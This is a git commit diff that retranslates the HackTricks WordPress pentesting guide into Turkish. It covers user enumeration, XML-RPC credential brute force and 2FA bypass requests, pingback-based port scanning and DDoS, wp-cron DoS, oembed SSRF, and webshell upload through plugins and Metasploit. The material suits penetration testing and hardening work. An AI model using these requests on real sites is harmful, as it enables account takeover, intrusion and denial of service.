Translated ['network-services-pentesting/pentesting-web/wordpress.md'] t

This commit is contained in:
Translator 2024-04-27 13:39:14 +00:00
parent 430d84b896
commit 53294aee0f

View file

@ -2,15 +2,15 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary><strong>Sıfırdan kahraman olacak şekilde AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
- [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com) edinin
- [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
- **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
- **Hacking püf noktalarınızı göndererek PR'lar aracılığıyla** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
@ -25,40 +25,40 @@ Bugün Erişim Alın:
## Temel Bilgiler
**Yüklenen** dosyalar şuraya gider: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**Temalar dosyaları /wp-content/themes/ içinde bulunabilir**, bu yüzden temanın bazı php'lerini değiştirirseniz RCE elde etmek için muhtemelen bu yolu kullanırsınız. Örneğin: **twentytwelve temasını** kullanarak **404.php** dosyasına erişebilirsiniz: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Başka faydalı bir URL şu olabilir:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
**Temalar dosyaları /wp-content/themes/ içinde bulunabilir,** bu yüzden temanın php'sini değiştirirseniz RCE elde etmek için muhtemelen bu yolu kullanacaksınız. Örneğin: **twentytwelve temasını** kullanarak **404.php** dosyasına erişebilirsiniz: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**Başka faydalı bir url şu olabilir:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
**wp-config.php** içinde veritabanının kök şifresini bulabilirsiniz.
**wp-config.php** dosyasında veritabanının kök şifresini bulabilirsiniz.
Kontrol edilmesi gereken varsayılan giriş yolları: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
### **Ana WordPress Dosyaları**
- `index.php`
- `license.txt` WordPress'in yüklü olduğu sürüm gibi yararlı bilgiler içerir.
- `wp-activate.php` yeni bir WordPress sitesi kurulurken e-posta aktivasyon işlemi için kullanılır.
- Giriş klasörleri (gizlemek için yeniden adlandırılmış olabilir):
- `/wp-admin/login.php`
- `/wp-admin/wp-login.php`
- `/login.php`
- `/wp-login.php`
- `xmlrpc.php`, HTTP'nin taşıma mekanizması olarak hareket eden ve kodlama mekanizması olarak XML'i kullanan WordPress'in bir özelliğini temsil eden bir dosyadır. Bu tür iletişim, WordPress [REST API](https://developer.wordpress.org/rest-api/reference) tarafından değiştirilmiştir.
- `wp-content` klasörü, eklentilerin ve temaların depolandığı ana dizindir.
- `wp-content/uploads/` Platforma yüklenen dosyaların depolandığı dizindir.
- `wp-includes/` Bu, sertifikalar, yazı tipleri, JavaScript dosyaları ve widget'lar gibi çekirdek dosyaların depolandığı dizindir.
- `wp-sitemap.xml` Wordpress sürümleri 5.5 ve üstünde, Worpress tüm genel gönderileri ve genel olarak sorgulanabilir gönderi türlerini ve taksonomileri içeren bir site haritası XML dosyası oluşturur.
* `index.php`
* `license.txt` WordPress'in yüklü olduğu sürüm gibi yararlı bilgiler içerir.
* `wp-activate.php` yeni bir WordPress sitesi kurulurken e-posta etkinleştirme işlemi için kullanılır.
* Giriş klasörleri (gizlemek için yeniden adlandırılmış olabilir):
* `/wp-admin/login.php`
* `/wp-admin/wp-login.php`
* `/login.php`
* `/wp-login.php`
* `xmlrpc.php`, WordPress'in bir özelliğini temsil eden bir dosyadır ve HTTP'nin taşıma mekanizması olarak ve XML'in kodlama mekanizması olarak kullanılmasına olanak tanır. Bu tür iletişim, WordPress [REST API](https://developer.wordpress.org/rest-api/reference) tarafından değiştirilmiştir.
* `wp-content` klasörü eklentilerin ve temaların depolandığı ana dizindir.
* `wp-content/uploads/` Platforma yüklenen dosyaların depolandığı dizindir.
* `wp-includes/` Bu, sertifikalar, yazı tipleri, JavaScript dosyaları ve widget'lar gibi çekirdek dosyaların depolandığı dizindir.
* `wp-sitemap.xml` Wordpress'in 5.5 ve üstü sürümlerinde, Wordpress tüm genel gönderileri ve genel olarak sorgulanabilir gönderi türlerini ve taksonomileri içeren bir site haritası XML dosyası oluşturur.
**Saldırı sonrası**
**Saldırı sonrası işlemler**
- `wp-config.php` dosyası, WordPress'in veritabanına bağlanmak için gereken bilgileri içerir; veritabanı adı, veritabanı ana bilgisayarı, kullanıcı adı ve şifre, kimlik doğrulama anahtarları ve tuzları ve veritabanı tablo öneki. Bu yapılandırma dosyası, sorun gidermede kullanışlı olabilecek DEBUG modunu etkinleştirmek için de kullanılabilir.
* `wp-config.php` dosyası, WordPress'in veritabanına bağlanmak için gereken bilgileri içerir; veritabanı adı, veritabanı ana bilgisayarı, kullanıcı adı ve şifre, kimlik doğrulama anahtarları ve tuzlar ve veritabanı tablo öneki. Bu yapılandırma dosyası ayrıca sorun gidermede kullanışlı olabilecek DEBUG modunu etkinleştirmek için de kullanılabilir.
### Kullanıcı İzinleri
- **Yönetici**
- **Editör**: Kendi ve diğerlerinin gönderilerini yayımlar ve yönetir
- **Yazar**: Kendi gönderilerini yayımlar ve yönetir
- **Katılımcı**: Gönderilerini yazabilir ve yönetebilir ancak yayımlayamaz
- **Abone**: Gönderileri göz atabilir ve profilini düzenleyebilir
* **Yönetici**
* **Editör**: Kendi ve diğerlerinin gönderilerini yayımlar ve yönetir
* **Yazar**: Kendi gönderilerini yayımlar ve yönetir
* **Katılımcı**: Gönderilerini yazabilir ve yönetebilir ancak yayımlayamaz
* **Abone**: Gönderileri göz atabilir ve profilini düzenleyebilir
## **Pasif Numaralandırma**
@ -66,9 +66,9 @@ Kontrol edilmesi gereken varsayılan giriş yolları: _**/wp-login.php, /wp-logi
`/license.txt` veya `/readme.html` dosyalarını bulup bulamadığınızı kontrol edin
Sayfanın **kaynak kodu** içinde (örnek: [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
Sayfanın **kaynak kodu içinde** (örnek: [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)):
- grep
* grep
```bash
curl https://victim.com/ | grep 'content="WordPress'
```
@ -96,9 +96,9 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
### Genel olarak sürümleri çıkartın
### Genel olarak sürümleri çıkart
{% code overflow="wrap" %}
{% endcode %}
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
@ -108,7 +108,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) kullanarak dünyanın en gelişmiş topluluk araçlarıyla desteklenen **iş akışlarını otomatikleştirin**.\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen **otomatik iş akışlarını** kolayca oluşturun ve otomatikleştirin.\
Bugün Erişim Edinin:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -117,17 +117,17 @@ Bugün Erişim Edinin:
### Eklentiler ve Temalar
Tüm Eklentileri ve Temaları bulamayabilirsiniz. Hepsini keşfetmek için bir Eklentiler ve Temalar listesini **aktif olarak Brute Force etmeniz gerekecek** (şansımıza, bu listeleri içeren otomatik araçlar var).
Muhtemelen tüm Eklentileri ve Temaları bulamayacaksınız. Hepsini keşfetmek için bir listeyi **aktif olarak Brute Force etmeniz gerekecek** (şansımıza, bu listeleri içeren otomatik araçlar bulunmaktadır).
### Kullanıcılar
**Kimlik Numarası Brute**
**Kimlik Brute**
WordPress sitesinden geçerli kullanıcıları Kimlik Numaralarını Brute Force ederek elde edebilirsiniz:
WordPress sitesinden geçerli kullanıcıları Brute Force yöntemiyle kullanıcı kimliklerini zorlayarak elde edersiniz:
```
curl -s -I -X GET http://blog.example.com/?author=1
```
Eğer yanıtlar **200** veya **30X** ise, bu, id'nin **geçerli** olduğu anlamına gelir. Eğer yanıt **400** ise, o zaman id **geçersiz**dir.
Eğer yanıtlar **200** veya **30X** ise, bu demektir ki id **geçerlidir**. Eğer yanıt **400** ise, o zaman id **geçersizdir**.
**wp-json**
@ -139,17 +139,17 @@ Başka bir `/wp-json/` uç noktası, kullanıcılar hakkında bazı bilgileri or
```
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
Bu uç noktanın yalnızca bir gönderi yapmış olan kullanıcıları ortaya çıkardığını unutmayın. **Bu özelliği etkinleştirmiş kullanıcılar hakkında bilgi sağlanacaktır**.
Bu uç noktanın yalnızca bir gönderi yapmış olan kullanıcıları ortaya çıkardığını unutmayın. **Yalnızca bu özelliğe sahip kullanıcılar hakkında bilgi sağlanacaktır**.
Ayrıca **/wp-json/wp/v2/pages** IP adreslerini sızdırabilir.
#### Kullanıcı adı girişi numaralandırması
**`/wp-login.php`**'ye giriş yaparken **mesaj**, belirtilen **kullanıcı adının var olup olmadığına bağlı olarak farklıdır**.
**`/wp-login.php`**'de oturum açarken **mesaj**, belirtilen **kullanıcı adının var olup olmadığına bağlı olarak farklıdır**.
### XML-RPC
`xml-rpc.php` etkinse kimlik bilgileri kaba kuvvet saldırısı gerçekleştirebilir veya diğer kaynaklara DoS saldırıları başlatmak için kullanabilirsiniz. (Bu süreci otomatikleştirebilirsiniz[ buna örnek olarak şunu kullanabilirsiniz](https://github.com/relarizky/wpxploit)).
`xml-rpc.php` etkinse kimlik bilgileri kaba kuvvet saldırısı gerçekleştirebilir veya diğer kaynaklara DoS saldırıları başlatmak için kullanabilirsiniz. (Bu işlemi otomatikleştirebilirsiniz[ buna örnek olarak şunu kullanabilirsiniz](https://github.com/relarizky/wpxploit)).
Etkin olup olmadığını görmek için _**/xmlrpc.php**_'ye erişmeyi deneyin ve bu isteği gönderin:
@ -164,7 +164,7 @@ Etkin olup olmadığını görmek için _**/xmlrpc.php**_'ye erişmeyi deneyin v
**Kimlik Bilgileri Kaba Kuvvet**
**`wp.getUserBlogs`**, **`wp.getCategories`** veya **`metaWeblog.getUsersBlogs`** gibi yöntemler kimlik bilgilerini kaba kuvvetle denemek için kullanılabilir. Eğer bunlardan herhangi birini bulabilirseniz şunu gönderebilirsiniz:
**`wp.getUserBlogs`**, **`wp.getCategories`** veya **`metaWeblog.getUsersBlogs`** gibi yöntemler kimlik bilgilerini kaba kuvvet saldırısı için kullanılabilir. Eğer bunlardan herhangi birini bulabilirseniz şunu gönderebilirsiniz:
```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
@ -174,10 +174,13 @@ Etkin olup olmadığını görmek için _**/xmlrpc.php**_'ye erişmeyi deneyin v
</params>
</methodCall>
```
```plaintext
200 kodlu yanıt içinde _"Kullanıcı adı veya şifre yanlış"_ mesajı görünmelidir eğer kimlik bilgileri geçerli değilse.
200 kodlu yanıt içindeki _"Kullanıcı adı veya şifre yanlış"_ mesajı, kimlik bilgileri geçerli değilse görünmelidir.
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../.gitbook/assets/image (718).png>)
Doğru kimlik bilgilerini kullanarak bir dosya yükleyebilirsiniz. Yanıtta yol görünecektir ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
@ -207,18 +210,18 @@ Etkin olup olmadığını görmek için _**/xmlrpc.php**_'ye erişmeyi deneyin v
</params>
</methodCall>
```
Ayrıca, **`system.multicall`** kullanarak aynı istekte birkaç kimlik bilgisini deneyerek kimlik bilgilerini zorlamak için **daha hızlı bir yol** vardır:
Ayrıca, **`system.multicall`** kullanarak aynı istekte birkaç kimlik doğrulama deneyebileceğiniz için kimlik doğrulama bilgilerini kaba kuvvetle daha hızlı bir şekilde deneyebileceğiniz bir **daha hızlı bir yol** vardır:
<figure><img src="../../.gitbook/assets/image (625).png" alt=""><figcaption></figcaption></figure>
**2FA'yı Atlatma**
Bu yöntem programlar içindir ve insanlar için değil, eski olduğu için 2FA'yı desteklemez. Dolayısıyla, geçerli kimlik bilgileriniz varsa ancak ana giriş 2FA ile korunuyorsa, **xmlrpc.php'yi kullanarak bu kimlik bilgileriyle 2FA'yı atlayarak oturum açabilirsiniz**. Tüm konsol üzerinden yapabileceğiniz tüm lemleri gerçekleştiremeyeceğinizi unutmayın, ancak Ippsec'in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) adresindeıkladığı gibi hala RCE'ye ulaşabilirsiniz.
Bu yöntem programlar içindir ve insanlar için değil, eski olduğundan dolayı 2FA'yı desteklemez. Dolayısıyla, geçerli kimlik bilgileriniz varsa ancak ana giriş 2FA ile korunuyorsa, **xmlrpc.php'yi kullanarak bu kimlik bilgileriyle 2FA'yı atlayarak oturum açabilirsiniz**. Tüm konsol üzerinden yapabileceğiniz tüm eylemleri gerçekleştiremeyeceğinizi unutmayın, ancak Ippsec'in [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) açıkladığı gibi hala RCE'ye ulaşabilirsiniz.
**DDoS veya port taraması**
Liste içinde _**pingback.ping**_ yöntemini bulabilirseniz, Wordpress'i herhangi bir ana makine/porta keyfi bir istek göndermeye zorlayabilirsiniz.\
Bu, **binlerce** Wordpress **sitesine** bir **konuma erişmelerini** istemek için kullanılabilir (bu konumda bir **DDoS** oluşturulur) veya bunu kullanarak **Wordpress**'i bazı iç ağları **taramaya** zorlayabilirsiniz (herhangi bir portu belirtebilirsiniz).
Eğer listede **_pingback.ping_** yöntemini bulabilirseniz, Wordpress'in herhangi bir ana makine/bağlantı noktasına keyfi bir istek göndermesini sağlayabilirsiniz.\
Bu, **binlerce** Wordpress **sitesinin** bir **konuma** erişmesini istemek için kullanılabilir (bu konumda bir **DDoS** oluşturulur) veya bunu kullanarak **Wordpress**'in bazı dahili **ağları taranmasını** sağlayabilirsiniz (herhangi bir bağlantı noktasını belirtebilirsiniz).
```markup
<methodCall>
<methodName>pingback.ping</methodName>
@ -228,11 +231,11 @@ Bu, **binlerce** Wordpress **sitesine** bir **konuma erişmelerini** istemek iç
</value></param></params>
</methodCall>
```
Eğer bir değeri 0'dan büyük olan **faultCode** alırsanız (17), bu portun açık olduğu anlamına gelir.
![](../../.gitbook/assets/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
Bu yöntemi DDoS saldırısına neden olmak için nasıl kötüye kullanacağınızı öğrenmek için önceki bölümde **`system.multicall`** kullanımına bakın.
Eğer bir değeri 0'dan büyük (17) olan bir **faultCode** alırsanız, bu portun açık olduğu anlamına gelir.
**DDoS**
Bu yöntemi DDoS saldırısına neden olmak için nasıl kötüye kullanacağınızı öğrenmek için önceki bölümde **`system.multicall`** kullanımına bir göz atın.
```markup
<methodCall>
<methodName>pingback.ping</methodName>
@ -246,9 +249,9 @@ Bu yöntemi DDoS saldırısına neden olmak için nasıl kötüye kullanacağın
### wp-cron.php DoS
Bu dosya genellikle Wordpress sitesinin kökünde bulunur: **`/wp-cron.php`**\
Bu dosyaya **erişildiğinde** a "**yoğun**" MySQL **sorgusu** gerçekleştirilir, bu nedenle **saldırganlar** tarafından **DoS** **saldırısı** yapmak için kullanılabilir.\
Ayrıca, varsayılan olarak, `wp-cron.php` her sayfa yüklendiğinde çağrılır (herhangi bir Wordpress sayfasını isteyen bir istemci her zaman), yüksek trafikli sitelerde sorunlara neden olabilir (DoS).
Bu dosya genellikle Wordpress sitesinin kök dizini altında bulunur: **`/wp-cron.php`**\
Bu dosyaya **erişildiğinde** a "**yoğun**" MySQL **sorgusu** gerçekleştirilir, bu nedenle **saldırganlar** tarafından **DoS** **oluşturmak** için kullanılabilir.\
Ayrıca, varsayılan olarak, `wp-cron.php` her sayfa yüklemede çağrılır (istemci herhangi bir Wordpress sayfasını istediğinde), yüksek trafikli sitelerde sorunlara neden olabilir (DoS).
Wp-Cron'un devre dışı bırakılması ve gereken işlemleri düzenli aralıklarla gerçekleştiren bir gerçek cronjob oluşturulması önerilir (sorunlara neden olmadan).
@ -256,7 +259,7 @@ Wp-Cron'un devre dışı bırakılması ve gereken işlemleri düzenli aralıkla
https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_ adresine erişmeyi deneyin ve Wordpress sitesi size bir istek yapabilir.
Bu, çalışmadığında gelen yanıttır:
Bu çalışmadığında alınan yanıt:
![](<../../.gitbook/assets/image (362).png>)
@ -275,14 +278,14 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen iş akışlarını kolayca oluşturun ve otomatikleştirin.\
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) kullanarak dünyanın en gelişmiş topluluk araçları tarafından desteklenen **otomatik iş akışlarını** kolayca oluşturun ve otomatikleştirin.\
Bugün Erişim Alın:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## Biraz üzerine yazarak erişim alın
Bu, gerçek bir saldırıdan ziyade bir meraktır. CTF'de [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) herhangi bir wordpress dosyasından 1 bit çevirebilirdiniz. Bu nedenle `/var/www/html/wp-includes/user.php` dosyasının `5389` konumunu çevirerek NOT (`!`) işlemini NOP yapabilirsiniz.
Bu, gerçek bir saldırıdan ziyade bir meraktır. CTF'de [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) herhangi bir wordpress dosyasından 1 bit çevirebilirdiniz. Bu sayede `/var/www/html/wp-includes/user.php` dosyasının `5389` konumunu çevirerek (`!`) işlemini devre dışı bırakabilirsiniz.
```php
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
@ -309,7 +312,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
### PHP eklentisi
Muhtemelen bir eklenti olarak .php dosyaları yüklemek mümkün olabilir.\
Bir eklenti olarak .php dosyaları yüklemek mümkün olabilir.\
Örneğin şu şekilde php arka kapınızı oluşturun:
![](<../../.gitbook/assets/image (180).png>)
@ -326,7 +329,7 @@ Procced'e tıklayın:
![](<../../.gitbook/assets/image (67).png>)
Büyük ihtimalle görünüşte hiçbir şey yapmayacak, ancak Medya'ya giderseniz yüklenen kabuğunuzu göreceksiniz:
Büyük ihtimalle görünüşte hiçbir şey yapmayacak, ancak Medya'ya giderseniz, yüklenen kabuğunuzu göreceksiniz:
![](<../../.gitbook/assets/image (459).png>)
@ -336,15 +339,15 @@ Erişin ve ters kabloyu yürütmek için URL'yi göreceksiniz:
### Zararlı eklenti yükleme ve etkinleştirme
Bu yöntem, zayıf olduğu bilinen zararlı bir eklentinin yüklenmesini ve bir web kabuğu elde etmek için sömürülmesini içerir. Bu işlem WordPress panosu aracılığıyla şu şekilde gerçekleştirilir:
Bu yöntem, zayıf olduğu bilinen zararlı bir eklentinin yüklenmesini ve bir web kabuğu elde etmek için sömürülmesini içerir. Bu işlem WordPress panosu üzerinden aşağıdaki gibi gerçekleştirilir:
1. **Eklenti Edinme**: Eklenti, Exploit DB gibi bir kaynaktan alınır, örneğin [**buradan**](https://www.exploit-db.com/exploits/36374).
2. **Eklenti Yükleme**:
* WordPress panosuna gidin, ardından `Pano > Eklentiler > Eklenti Yükle`'ye gidin.
* İndirilen eklentinin zip dosyasını yükleyin.
3. **Eklenti Etkinleştirme**: Eklenti başarılı bir şekilde yüklendikten sonra, panelden etkinleştirilmelidir.
3. **Eklenti Etkinleştirme**: Eklenti başarılı bir şekilde yüklendikten sonra, panoda etkinleştirilmelidir.
4. **Sömürü**:
* "reflex-gallery" eklentisi yüklü ve etkin olduğunda, zayıf olduğu bilindiği için sömürülebilir.
* "reflex-gallery" eklentisi yüklü ve etkinleştirildiğinde, zayıf olduğu bilindiği için sömürülebilir.
* Metasploit çerçevesi bu zafiyet için bir sömürü sağlar. Uygun modülü yükleyerek ve belirli komutları yürüterek, bir meterpreter oturumu oluşturulabilir ve siteye yetkisiz erişim sağlanabilir.
* Bu, bir WordPress sitesini sömürmek için birçok yöntemden sadece biri olduğu belirtilmektedir.
@ -384,8 +387,8 @@ Ayrıca, **yalnızca güvenilir WordPress eklentileri ve temaları yükleyin**.
* Varsayılan **admin** kullanıcısını kaldırın
* **Güçlü şifreler** ve **2FA** kullanın
* Kullanıcıların **izinlerini periyodik olarak gözden geçirin**
* Brute Force saldırılarını önlemek için **giriş denemesini sınırlayın**
* Kullanıcı **izinlerini periyodik olarak gözden geçirin**
* Kaba kuvvet saldırılarını önlemek için **giriş denemesini sınırlayın**
* **`wp-admin.php`** dosyasını yeniden adlandırın ve yalnızca dahili olarak veya belirli IP adreslerinden erişime izin verin.
<figure><img src="../../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
@ -405,7 +408,7 @@ HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek.
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katılın.
</details>